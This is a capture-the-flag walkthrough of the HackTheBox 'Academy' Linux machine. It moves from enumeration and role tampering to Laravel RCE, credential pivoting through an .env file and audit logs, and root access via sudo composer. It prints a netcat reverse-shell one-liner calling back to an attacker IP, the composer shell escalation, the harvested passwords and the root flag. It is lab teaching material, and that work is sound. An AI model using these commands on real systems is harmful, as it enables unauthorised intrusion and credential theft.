Academy

#Linux #Enumeration #Laravel #UserPivoting

Academy is an easy-rated Linux machine from HackTheBox, created by egre55 and mrb3n. In the current post, my IP is 10.10.14.44, and the target IP is 10.129.167.56

This machine features an apache server hosting a PHP website. The website doesn't look special until you intercept the registration process, where you can change a obvious parameter to change your privileges to that account, then when you fuzz the website, you find an admin login url. In that URL there is an sub-domain with error logs from Laravel, revealing in the process the API_KEY used for an exploit for RCE. Inside the machine, there are a lot of techniques used to pivot between users and the change your user to root.

Recon

The first steps are about getting basic information about the target, by using nmap and searching information from the website.

Local Terminal

$ ping -c 1 10.129.167.56

Pinging 10.129.167.56 with 32 bytes of data:
Reply from 10.129.167.56: bytes=32 time=141ms TTL=63
Reply from 10.129.167.56: bytes=32 time=173ms TTL=63
Reply from 10.129.167.56: bytes=32 time=142ms TTL=63
Reply from 10.129.167.56: bytes=32 time=144ms TTL=63

Ping statistics for 10.129.167.56:
    Packets: Sent = 4, Received = 4, Lost = 0 (0% loss),
Approximate round trip times in milli-seconds:
    Minimum = 141ms, Maximum = 173ms, Average = 150ms

By the TTL, we can assume that is a Linux Machine.

Local Terminal

$ nmap -p- --open -sS --min-rate 5000 -vvv -n 10.129.167.56 -oN Ports

Nmap scan report for 10.129.167.56
Host is up, received reset ttl 63 (0.16s latency).
Scanned at 2023-06-06 10:37:16 Pacific SA Standard Time for 16s
Not shown: 65283 closed tcp ports (reset), 249 filtered tcp ports (no-response)
Some closed ports may be reported as filtered due to --defeat-rst-ratelimit
PORT      STATE SERVICE REASON
22/tcp    open  ssh     syn-ack ttl 63
80/tcp    open  http    syn-ack ttl 63
33060/tcp open  mysqlx  syn-ack ttl 63

Read data files from: C:\Program Files (x86)\Nmap
Nmap done: 1 IP address (1 host up) scanned in 16.10 seconds
           Raw packets sent: 76803 (3.379MB) | Rcvd: 74737 (2.990MB)

Local Terminal

$ nmap -sCV -p 22,80,33060 10.129.167.56 -oN Target

Nmap scan report for 10.129.167.56
Host is up (0.15s latency).

PORT      STATE SERVICE VERSION
22/tcp    open  ssh     OpenSSH 8.2p1 Ubuntu 4ubuntu0.1 (Ubuntu Linux; protocol 2.0)
| ssh-hostkey:
|   3072 c0:90:a3:d8:35:25:6f:fa:33:06:cf:80:13:a0:a5:53 (RSA)
|   256 2a:d5:4b:d0:46:f0:ed:c9:3c:8d:f6:5d:ab:ae:77:96 (ECDSA)
|_  256 e1:64:14:c3:cc:51:b2:3b:a6:28:a7:b1:ae:5f:45:35 (ED25519)
80/tcp    open  http    Apache httpd 2.4.41 ((Ubuntu))
|_http-server-header: Apache/2.4.41 (Ubuntu)
|_http-title: Did not follow redirect to http://academy.htb/
33060/tcp open  mysqlx?
1 service unrecognized despite returning data. If you know the service/version, please submit the following fingerprint at https://nmap.org/cgi-bin/submit.cgi?new-service :
SF-Port33060-TCP:V=7.92%I=7%D=6/6%Time=647F44D8%P=i686-pc-windows-windows%
SF:r(GenericLines,9,"\x05\0\0\0\x0b\x08\x05\x1a\0");
Service Info: OS: Linux; CPE: cpe:/o:linux:linux_kernel

Service detection performed. Please report any incorrect results at https://nmap.org/submit/ .
Nmap done: 1 IP address (1 host up) scanned in 176.95 seconds

If you search for "OpenSSH 8.2p1 Ubuntu 4ubuntu0.1 launchpad", you can find the specific machine type, in this case the result was: "Ubuntu Focal". It could be useful to find an vulnerability for a certain version.

Information that we have now: It's a website (port 80) that use Apache/2.4.41, with an open mysqlx (port 33060), there is no response for now.

Because of the following message "Did not follow redirect to http://academy.htb/" we have to add the IP to /etc/hosts/

Local Terminal

$ whatweb http://academy.htb

http://academy.htb [200 OK] Apache[2.4.41], Country[RESERVED][ZZ], 
HTTPServer[Ubuntu Linux][Apache/2.4.41 (Ubuntu)], IP[10.129.167.56], 
Title[Hack The Box Academy]

Browser: http://academy.htb/

If you go to Login, the URL is "http://academy.htb/login.php", this is a good opportunity to fuzz with php termination.

Local Terminal

wfuzz -c -f PHPfuzz -t 200 --hc=404 -w /shared/wordlists/dirbuster/directory-list-2.3-medium.txt http://academy.htb/FUZZ.php

********************************************************
* Wfuzz 3.1.0 - The Web Fuzzer                         *
********************************************************

Target: http://academy.htb/FUZZ.php
Total requests: 220546

=====================================================================
ID           Response   Lines    Word       Chars       Payload
=====================================================================

000000001:   200        76 L     131 W      2117 Ch     "index"
000000039:   200        141 L    226 W      2627 Ch     "login"
000000245:   200        141 L    227 W      2633 Ch     "admin"
000000024:   302        1049 L   4114 W     55034 Ch    "home"
000000051:   200        148 L    247 W      3003 Ch     "register"
000001476:   200        0 L      0 W        0 Ch        "config"
000045226:   403        9 L      28 W       276 Ch      "http://academy.htb/.php"

Index.php: Nothing
login.php: useful after registration.
admin.php: Admin login panel, it could be useful.
home.php: Redirect to login.php
register.php: Registration form.
config.php: 403, Empty

Our alternatives now is to intercept the registration panel with burpsuite.

Exploitation

At the response, we can see that between the parameters, there is a "roleid", before we found an admin.php.

So, our best action is to change the roleid to 1 and create a new account.

Then, go to http://academy.htb/admin.php and login with the new user... after this, you will see the following thing:

Hey! There is a subdomain, add it to /etc/hosts.

http://dev-staging-01.academy.htb/

Reverse Shell [www-data]

The website shows a Laravel error, maybe it could be vulnerable to something, search it at exploit-db.com. I tried the CVE-2021-3129 but it doesn't work. And the CVE-2018-15133 requieres metasploit, but there are alternatives at github.

GitHub - aljavier/exploit_laravel_cve-2018-15133: Exploit for Laravel Remote Code Execution with API_KEY (CVE-2018-15133)GitHub

Local Terminal

git clone https://github.com/aljavier/exploit_laravel_cve-2018-15133

The structure of the command is the following:

pwn_laravel.py [-h] [-c COMMAND] [-m {1,2,3,4}] [-i] URL API_KEY

Local Terminal

python3 pwn_laravel.py http://dev-staging-01.academy.htb/ dBLUaMuZz7Iq06XtL/Xnz/90Ejq+DEEynggqubHWFj0= --interactive

Now, open a new local terminal

Local Terminal B

nc -nlvp 443

CVE Interactive Terminal

rm /tmp/f;mkfifo /tmp/f;cat /tmp/f|/bin/sh -i 2>&1|nc 10.10.14.44 443 >/tmp/f

And you are in! Close the CVE Interactive Terminal and do a Bash Upgrade at the other terminal

User Pivoting [cry0l1t3]

Target Terminal [www-data]

www-data@academy:/var/www/html$ id
uid=33(www-data) gid=33(www-data) groups=33(www-data)

www-data@academy:/var/www/html$ ls -la
total 20
drwxr-xr-x  4 root     root     4096 Aug 13  2020 .
drwxr-xr-x  3 root     root     4096 Aug  7  2020 ..
drwxr-xr-x 12 www-data www-data 4096 Aug 13  2020 academy
drwxr-xr-x 12 root     root     4096 Aug 13  2020 htb-academy-dev-01
-rw-r--r--  1 www-data www-data   50 Aug  9  2020 index.php

# We are at -dev-, is a good idea to check the current working files at academy
www-data@academy:/var/www/html$ cd academy/

www-data@academy:/var/www/html/academy$ ls -la
total 280
drwxr-xr-x 12 www-data www-data   4096 Aug 13  2020 .
drwxr-xr-x  4 root     root       4096 Aug 13  2020 ..
-rw-r--r--  1 www-data www-data    706 Aug 13  2020 .env
-rw-r--r--  1 www-data www-data    651 Feb  7  2018 .env.example
-rw-r--r--  1 www-data www-data    111 Feb  7  2018 .gitattributes
-rw-r--r--  1 www-data www-data    155 Feb  7  2018 .gitignore
drwxr-xr-x  6 www-data www-data   4096 Feb  7  2018 app
-rwxr-xr-x  1 www-data www-data   1686 Feb  7  2018 artisan
<...>

There is an interesting hidden file called .env, type cat .env

Target Terminal [www-data]

AAPP_NAME=Laravel
APP_ENV=local
APP_KEY=base64:dBLUaMuZz7Iq06XtL/Xnz/90Ejq+DEEynggqubHWFj0=
APP_DEBUG=false
APP_URL=http://localhost

LOG_CHANNEL=stack

DB_CONNECTION=mysql
DB_HOST=127.0.0.1
DB_PORT=3306
DB_DATABASE=academy
DB_USERNAME=dev
DB_PASSWORD=mySup3rP4s5w0rd!! #Password!

BROADCAST_DRIVER=log
CACHE_DRIVER=file
SESSION_DRIVER=file
SESSION_LIFETIME=120
QUEUE_DRIVER=sync

REDIS_HOST=127.0.0.1
REDIS_PASSWORD=null
REDIS_PORT=6379

MAIL_DRIVER=smtp
MAIL_HOST=smtp.mailtrap.io
MAIL_PORT=2525
MAIL_USERNAME=null
MAIL_PASSWORD=null
MAIL_ENCRYPTION=null

PUSHER_APP_ID=
PUSHER_APP_KEY=
PUSHER_APP_SECRET=
PUSHER_APP_CLUSTER=mt1

MIX_PUSHER_APP_KEY="${PUSHER_APP_KEY}"
MIX_PUSHER_APP_CLUSTER="${PUSHER_APP_CLUSTER}"

Now we can test that password with other users, we can enumerate them at /home

Target Terminal [www-data]

www-data@academy:/home$ ls -l

total 32
drwxr-xr-x  2 21y4d    21y4d    4096 Aug 10  2020 21y4d
drwxr-xr-x  2 ch4p     ch4p     4096 Aug 10  2020 ch4p
drwxr-xr-x  4 cry0l1t3 cry0l1t3 4096 Aug 12  2020 cry0l1t3
drwxr-xr-x  3 egre55   egre55   4096 Aug 10  2020 egre55
drwxr-xr-x  2 g0blin   g0blin   4096 Aug 10  2020 g0blin
drwxr-xr-x  5 mrb3n    mrb3n    4096 Aug 12  2020 mrb3n

After testing with each { $user : mySup3rP4s5w0rd!! } the correct one is cry0l1t3

Target Terminal [www-data]

$ su cry0l1t3

$ cat /home/cry0l1t3/user.txt

User Pivoting [mrb3n]

Target Terminal [cry0l1t3]

$ id
uid=1002(cry0l1t3) gid=1002(cry0l1t3) groups=1002(cry0l1t3),4(adm)

The user is from the group adm, maybe we can use an specific command or read some logs.

Target Terminal [cry0l1t3]

$ cd /

$ find \-group adm 2>/dev/null
<...>
./var/log/apt/term.log.3.gz
./var/log/apt/term.log.1.gz
./var/log/apt/term.log.4.gz
./var/log/apt/term.log
./var/log/audit
./var/log/audit/audit.log.2
./var/log/audit/audit.log
./var/log/audit/audit.log.3
./var/log/audit/audit.log.1
./var/log/syslog.4.gz
./var/log/syslog.7.gz
./var/log/auth.log.2.gz
./var/log/auth.log.1
./var/log/syslog.3.gz
<...>

Usually the logs located at /var/log/audit/ are important, but they have a LOT of information, a good alternative is to use "grep" to find relevant data.

Target Terminal [cry0l1t3]

$ cd /var/log/audit/

# Remember that our current uid is 1002, so we need another one.
$ grep -r "uid=1001" | grep "cmd"
audit.log:type=USER_CMD msg=audit(1612880564.224:115): pid=1336 uid=1001 auid=1001 ses=1 msg='cwd="/home/mrb3n" cmd=636F6D706F736572202D2D776F726B696E672D6469723D2F746D702F746D702E6F4A4833443269514D322072756E2D7363726970742078 terminal=tty1 res=success'
audit.log:type=USER_CMD msg=audit(1612880564.412:119): pid=1353 uid=0 auid=1001 ses=1 msg='cwd="/tmp/tmp.oJH3D2iQM2" cmd=7375646F202D4B terminal=tty1 res=success'
audit.log:type=USER_CMD msg=audit(1612880607.016:128): pid=1788 uid=0 auid=1001 ses=1 msg='cwd="/tmp/tmp.oJH3D2iQM2" cmd=2F7573722F62696E2F656469746F72202D2D202F terminal=tty1 res=success'
<...>

# From here, we want:
# 2F7573722F62696E2F656469746F72202D2D202F
# Between "cmd=" and "terminal=

From here, we want a hash like "2F7573722F62696E2F656469746F72202D2D202F" between cmd= and Terminal=, to apply xxd -ps -r

Target Terminal [cry0l1t3]

grep -r "uid=1001" | grep "cmd" | grep -oP '(?<=cmd=).*(?= terminal)' | sort -u | xxd -ps -r

Nothing here, now we will tesst with uid=1000

Target Terminal [cry0l1t3]

grep -r "uid=1000" | grep "cmd" | grep -oP '(?<=cmd=).*(?= terminal)' | sort -u | xxd -ps -r

But there is another interesting rows, the ones that contain "TYPE=tty" and "data="

Target Terminal [cry0l1t3]

grep -r tty | grep -oP '(?<=data=).*' | sort -u | xxd -ps -r ; echo

exithistory
mrb3n_Ac@d3my!
su mrb3n
whoami
cat dat
<...>

Target Terminal [cry0l1t3]

su mrb3n   # Password: mrb3n_Ac@d3my!

Privileges Escalation

Target Terminal [mrb3n]

$ id
uid=1001(mrb3n) gid=1001(mrb3n) groups=1001(mrb3n)

$ sudo -l
[sudo] password for mrb3n:
Matching Defaults entries for mrb3n on academy:
    env_reset, mail_badpass, secure_path=/usr/local/sbin\:/usr/local/bin\:/usr/sbin\:/usr/bin\:/sbin\:/bin\:/snap/bin

User mrb3n may run the following commands on academy:
    (ALL) /usr/bin/composer

At GTFOBin there is a way to escalate privileges with sudo using composer

composer | GTFOBinsgtfobins.github.io

Target Terminal [mrb3n]

TF=$(mktemp -d)
echo '{"scripts":{"x":"/bin/sh -i 0<&3 1>&3 2>&3"}}' >$TF/composer.json
sudo composer --working-dir=$TF run-script x

Target Terminal [root]

$ whoami
root

$ cat /root/root.txt
e13da1f49d8d784bffa5504154a3d8f8

PreviousEasy Machine NextBashed

Last updated 1 year ago